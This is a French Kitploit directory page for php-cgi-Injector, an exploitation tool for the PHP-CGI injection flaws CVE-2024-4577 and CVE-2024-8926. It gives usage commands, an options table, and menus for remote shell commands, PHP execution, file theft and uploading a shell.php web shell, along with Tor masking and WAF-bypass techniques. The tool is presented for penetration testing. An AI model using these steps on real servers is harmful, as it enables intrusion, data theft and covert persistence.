Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
php-cgi-Injector — 一個測試CVE-2024-4577和CVE-2024-8926的安全滲透工具 | Kitploit
Outils/GitHubGitHub/night-have-dreams/php-cgi-injector
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWAF BypassPenetration TestingCommand and Control
GitHubnight-have-dreams/php-cgi-injector

php-cgi-Injector

一個測試CVE-2024-4577和CVE-2024-8926的安全滲透工具

Voir le dépôt
492il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PHP-CGI Injector

🚀 CVE-2024-4577 & CVE-2024-8926 Outil d'exploitation

Outil automatisé de test pour la vulnérabilité d'injection de paramètres PHP-CGI, prenant en charge les CVE-2024-4577 et CVE-2024-8926, permettant des opérations telles que l'exécution de commandes, le téléchargement et le téléversement de fichiers.


📌 Introduction

Cet outil permet de tester la vulnérabilité d'injection de paramètres dans un environnement PHP-CGI et propose :

  • ✅ Interface terminale super cool avec effets d'animation
  • ✅ Scanner de vulnérabilité automatisé
  • ✅ Multiples modes d'attaque (Shell, exécution de code PHP, téléversement/téléchargement de fichiers)
  • ✅ Combinaisons de payloads prédéfinies et personnalisées
  • ✅ Mode de masquage du trafic via Tor
  • ✅ Plusieurs modules de contournement WAF
  • ✅ Conversion automatique du codage de sortie
  • ✅ Mode d'exploitation forcée (même sans détection de vulnérabilité)
  • ❌ Ne prépare pas le café, mais torréfie le WAF.
  • ❌ Ne rédige pas de rapports, ne trouve pas de petite amie, ni ne permet d'intégrer une école supérieure.
  • ❌ Pas d'ingénierie sociale, gérez vos interactions humaines vous-même.

📜 Avertissement et clause de non-responsabilité

Cet outil est destiné uniquement aux tests légitimes et à des fins académiques. Ne l'utilisez pas sur des systèmes non autorisés !

⚠️ Toute utilisation illégale engage votre responsabilité juridique !

Cet outil est uniquement destiné à :

  • 🔹 Tests d'intrusion en équipe rouge d'entreprise
  • 🔹 Recherche en sécurité CTF
  • 🔹 Apprentissage personnel de la sécurité
  • 🔹 Autres tests de sécurité dûment autorisés

📥 Installation des dépendances

Cet outil dépend des packages Python suivants, veuillez d'abord les installer :

root@kitploit:~
pip install -r requirements.txt

Ou les installer manuellement :

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ Mode d'emploi

📌 Utilisation de base

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

Exemples :

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 Options des paramètres


📌 Modes d'exploitation

Lorsque le script trouve une vulnérabilité, il affiche le menu suivant :

root@kitploit:~
╭────────────  Menu du mode Exploit  ────────────╮
│ Cible actuelle : http://example.com/           │
│ Point d'injection actuel : /php-cgi/php-cgi.exe│
│ Identifiant de vulnérabilité : CVE-2024-4577   │
╰────────────────────────────────────────────────╯
1) 🧪 Mode Shell
2) 🛠️ Mode PHP personnalisé
3) 📤 Téléverser un fichier
4) 📥 Télécharger un fichier
5) 🎯 Changer de cible
6) ⚙️ Configurer les paramètres
7) ❌ Quitter le programme
>>

📌 Détail des modes

1️⃣ Mode Shell

Exécute une commande système :

root@kitploit:~
shell> whoami

📂 Sauvegarder la sortie

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ Mode PHP personnalisé

Exécute du code PHP personnalisé :

root@kitploit:~
phpinfo();
EOF

📂 Sauvegarder la sortie

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ Téléverser un fichier

root@kitploit:~
Chemin du fichier local : C:\test\shell.php
Chemin complet de destination :
[*] Chemin de téléversement défini automatiquement sur : C:/xampp/htdocs/shell.php

📂 Chemin spécifié manuellement

root@kitploit:~
Chemin complet de destination : C:\xampp\php\shell.php

4️⃣ Télécharger un fichier

root@kitploit:~
Chemin du fichier distant : C:\xampp\htdocs\index.php

📂 Le fichier téléchargé est sauvegardé dans download/ ; en cas de doublon, un numéro est ajouté automatiquement

root@kitploit:~
[*] Téléchargement terminé, sauvegardé sous download/index.php

5️⃣ Changer de cible

root@kitploit:~
Saisissez la nouvelle URL cible : http://newtarget.com

🔹 Un nouveau test de vulnérabilité sera effectué


6️⃣ Changement de paramètres

root@kitploit:~
[⚙️ Menu de configuration des paramètres d'exploitation]

1) Changer payload                   1
2) Module bypass                     Non sélectionné
3) Temps d'attente (Timeout)        10 secondes
4) Délai des requêtes (Delay)       0 seconde
5) Enregistrement automatique (Log) Désactivé
6) Mode détaillé (Verbose)          Désactivé
7) Effets d'animation (Effects)     Activé
8) Mode forcé (Force)               Désactivé
9) Sauvegarder et retourner au menu Exploit

📌 Module de contournement WAF (Bypass)

Les stratégies de contournement suivantes sont disponibles :

  • Déformation du chemin CGI
  • Ajout de caractères non valides avant et après le payload
  • Remplacement de php://input par d'autres formes
  • Ajout d'en-têtes HTTP spécifiques ou aléatoires
  • Brouillage du contenu POST
  • Mélange aléatoire de l'ordre des payloads
  • Script de contournement personnalisé, voir le format dans tamper_example_template.txt
Télécharger l’outil
ParamètreDescriptionExemple
-u , --urlSpécifie l'URL cible-u http://example.com
--timeout secDéfinit le délai d'expiration de la requête (0 = infini)--timeout 30
--logEnregistre automatiquement les commandes shell--log
--payloadSpécifie ou personnalise la combinaison de payloads--payload 2
--torEnvoie les requêtes via Tor--tor
--verboseAffiche les messages détaillés--verbose
--bypassActive le mode de contournement WAF--bypass
--forceForce l'entrée en mode exploitation--force
--cgipoint PATHSSpécifie des chemins CGI particuliers à tester--cgipoint /path
--delay secDélai en secondes entre chaque requête--delay 1.5
--no-effectsDésactive toutes les animations et les délais--no-effects